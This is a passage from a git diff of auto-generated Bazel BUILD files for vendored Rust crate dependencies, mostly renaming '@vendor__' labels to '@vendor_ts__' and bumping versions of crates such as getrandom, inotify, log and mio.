"@rules_rust//rust/platform:armv7-linux-androideabi": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:i686-apple-darwin": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "macos", target_os = "openbsd", target_os = "vita", target_os = "emscripten")) + ], + "@rules_rust//rust/platform:i686-linux-android": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [ + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(all(windows, not(target_vendor = "win7"))) + ], + "@rules_rust//rust/platform:i686-unknown-freebsd": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "dragonfly", target_os = "freebsd", target_os = "hurd", target_os = "illumos", all(target_os = "horizon", target_arch = "arm"))) + ], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:x86_64-apple-darwin": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "macos", target_os = "openbsd", target_os = "vita", target_os = "emscripten")) + ], + "@rules_rust//rust/platform:x86_64-apple-ios": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "ios", target_os = "visionos", target_os = "watchos", target_os = "tvos")) + ], + "@rules_rust//rust/platform:x86_64-linux-android": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(all(windows, not(target_vendor = "win7"))) + ], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "dragonfly", target_os = "freebsd", target_os = "hurd", target_os = "illumos", all(target_os = "horizon", target_arch = "arm"))) + ], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "//conditions:default": [], + }), +) + +cargo_build_script( + name = "_bs", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + "**/*.rs", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "std", + ], + crate_name = "build_script_build", + crate_root = "build.rs", + data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + edition = "2021", + pkg_name = "getrandom", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=getrandom", + "manual", + "noclippy", + "norustfmt", + ], + version = "0.3.1", + visibility = ["//visibility:private"], +) + +alias( + name = "build_script_build", + actual = ":_bs", + tags = ["manual"], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel index f0c754989697..c7341c6d1f1b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.globset-0.4.15.bazel @@ -85,10 +85,10 @@ rust_library( }), version = "0.4.15", deps = [ - "@vendor__aho-corasick-1.1.3//:aho_corasick", - "@vendor__bstr-1.11.3//:bstr", - "@vendor__log-0.4.22//:log", - "@vendor__regex-automata-0.4.9//:regex_automata", - "@vendor__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__aho-corasick-1.1.3//:aho_corasick", + "@vendor_ts__bstr-1.11.3//:bstr", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__regex-automata-0.4.9//:regex_automata", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel index 5d955b693c3c..3908ba2dea47 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.home-0.5.11.bazel @@ -82,13 +82,13 @@ rust_library( version = "0.5.11", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel index 006e1ef22bab..98fd2110ebbe 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-0.1.61.bazel @@ -85,47 +85,47 @@ rust_library( version = "0.1.61", deps = select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") + "@vendor_ts__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") + "@vendor_ts__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__js-sys-0.3.76//:js_sys", # cfg(all(target_arch = "wasm32", target_os = "unknown")) - "@vendor__wasm-bindgen-0.2.99//:wasm_bindgen", # cfg(all(target_arch = "wasm32", target_os = "unknown")) + "@vendor_ts__js-sys-0.3.76//:js_sys", # cfg(all(target_arch = "wasm32", target_os = "unknown")) + "@vendor_ts__wasm-bindgen-0.2.99//:wasm_bindgen", # cfg(all(target_arch = "wasm32", target_os = "unknown")) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) + "@vendor_ts__core-foundation-sys-0.8.7//:core_foundation_sys", # cfg(any(target_os = "macos", target_os = "ios")) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") + "@vendor_ts__android_system_properties-0.1.5//:android_system_properties", # cfg(target_os = "android") ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") + "@vendor_ts__windows-core-0.52.0//:windows_core", # cfg(target_os = "windows") ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel index 97beb36734fd..c07a773cbeaf 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.iana-time-zone-haiku-0.1.2.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.1.2", deps = [ - "@vendor__iana-time-zone-haiku-0.1.2//:build_script_build", + "@vendor_ts__iana-time-zone-haiku-0.1.2//:build_script_build", ], ) @@ -134,7 +134,7 @@ cargo_build_script( version = "0.1.2", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel index 5947f8c959bf..f5728f60e0e1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-1.9.3.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "1.9.3", deps = [ - "@vendor__hashbrown-0.12.3//:hashbrown", - "@vendor__indexmap-1.9.3//:build_script_build", + "@vendor_ts__hashbrown-0.12.3//:hashbrown", + "@vendor_ts__indexmap-1.9.3//:build_script_build", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "1.9.3", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel index c4caf3ebfa46..de2ed0d53275 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.indexmap-2.7.0.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "2.7.0", deps = [ - "@vendor__equivalent-1.0.1//:equivalent", - "@vendor__hashbrown-0.15.2//:hashbrown", + "@vendor_ts__equivalent-1.0.1//:equivalent", + "@vendor_ts__hashbrown-0.15.2//:hashbrown", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.9.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.11.0.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.9.6.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.11.0.bazel index 9b8089c8bb81..8abc71e58117 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.9.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-0.11.0.bazel @@ -79,10 +79,10 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.9.6", + version = "0.11.0", deps = [ - "@vendor__bitflags-1.3.2//:bitflags", - "@vendor__inotify-sys-0.1.5//:inotify_sys", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__inotify-sys-0.1.5//:inotify_sys", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel index c31f00f36823..3e23ee4dea6f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.inotify-sys-0.1.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.5", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel index 6fd6eb800b46..e9f3a3532d3a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.12.1.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.12.1", deps = [ - "@vendor__either-1.13.0//:either", + "@vendor_ts__either-1.14.0//:either", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel index 6c9dac8660ef..020cdf4b9dad 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.itertools-0.14.0.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.14.0", deps = [ - "@vendor__either-1.13.0//:either", + "@vendor_ts__either-1.14.0//:either", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel index 07a7873c5c15..c4c245329262 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.js-sys-0.3.76.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.3.76", deps = [ - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__wasm-bindgen-0.2.99//:wasm_bindgen", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__wasm-bindgen-0.2.99//:wasm_bindgen", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel index 90ebace5cef3..25390d540e0e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-1.0.8.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.0.8", deps = [ - "@vendor__kqueue-sys-1.0.4//:kqueue_sys", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__kqueue-sys-1.0.4//:kqueue_sys", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel index 16504b28cb82..e226e4b77c7f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.kqueue-sys-1.0.4.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.0.4", deps = [ - "@vendor__bitflags-1.3.2//:bitflags", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__bitflags-1.3.2//:bitflags", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel index 4c96b7c5dc95..d3cef09f0cd8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libc-0.2.169.bazel @@ -86,7 +86,7 @@ rust_library( }), version = "0.2.169", deps = [ - "@vendor__libc-0.2.169//:build_script_build", + "@vendor_ts__libc-0.2.169//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel index f13d15a95e10..4bbbe82982c5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.libredox-0.1.3.bazel @@ -81,8 +81,8 @@ rust_library( }), version = "0.1.3", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__libc-0.2.169//:libc", - "@vendor__redox_syscall-0.5.8//:syscall", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__libc-0.2.169//:libc", + "@vendor_ts__redox_syscall-0.5.8//:syscall", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel index 2e36a7d3ab24..0606a147a5cb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.line-index-0.1.2.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "0.1.2", deps = [ - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel index 7998bc5361fa..3044c1276928 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.lock_api-0.4.12.bazel @@ -86,8 +86,8 @@ rust_library( }), version = "0.4.12", deps = [ - "@vendor__lock_api-0.4.12//:build_script_build", - "@vendor__scopeguard-1.2.0//:scopeguard", + "@vendor_ts__lock_api-0.4.12//:build_script_build", + "@vendor_ts__scopeguard-1.2.0//:scopeguard", ], ) @@ -143,7 +143,7 @@ cargo_build_script( version = "0.4.12", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel index 5c06b96e63fe..c17f4cad96b1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.3.9.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.3.9", deps = [ - "@vendor__log-0.4.22//:log", + "@vendor_ts__log-0.4.25//:log", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.22.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.25.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.22.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.25.bazel index 74a985fb2ee4..a2e0e15b13ef 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.22.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.log-0.4.25.bazel @@ -82,5 +82,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.4.22", + version = "0.4.25", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel index 792b5181e1dd..90227adce7e5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.matchers-0.1.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.0", deps = [ - "@vendor__regex-automata-0.1.10//:regex_automata", + "@vendor_ts__regex-automata-0.1.10//:regex_automata", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel index 7342bcdd53fd..19d3d136021e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.memoffset-0.9.1.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.9.1", deps = [ - "@vendor__memoffset-0.9.1//:build_script_build", + "@vendor_ts__memoffset-0.9.1//:build_script_build", ], ) @@ -140,7 +140,7 @@ cargo_build_script( version = "0.9.1", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.5.bazel similarity index 98% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.2.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.5.bazel index 2c0bb16b669f..2d7b2e2a69fc 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.miniz_oxide-0.8.5.bazel @@ -82,8 +82,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.8.2", + version = "0.8.5", deps = [ - "@vendor__adler2-2.0.0//:adler2", + "@vendor_ts__adler2-2.0.0//:adler2", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-0.8.11.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-1.0.3.bazel similarity index 74% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-0.8.11.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-1.0.3.bazel index 8f8955e3a753..617822e3a9ca 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-0.8.11.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.mio-1.0.3.bazel @@ -35,7 +35,7 @@ rust_library( "os-poll", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -85,94 +85,94 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.8.11", + version = "1.0.3", deps = [ - "@vendor__log-0.4.22//:log", + "@vendor_ts__log-0.4.25//:log", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.52.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.48.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.52.0//:windows_sys", # cfg(windows) ], 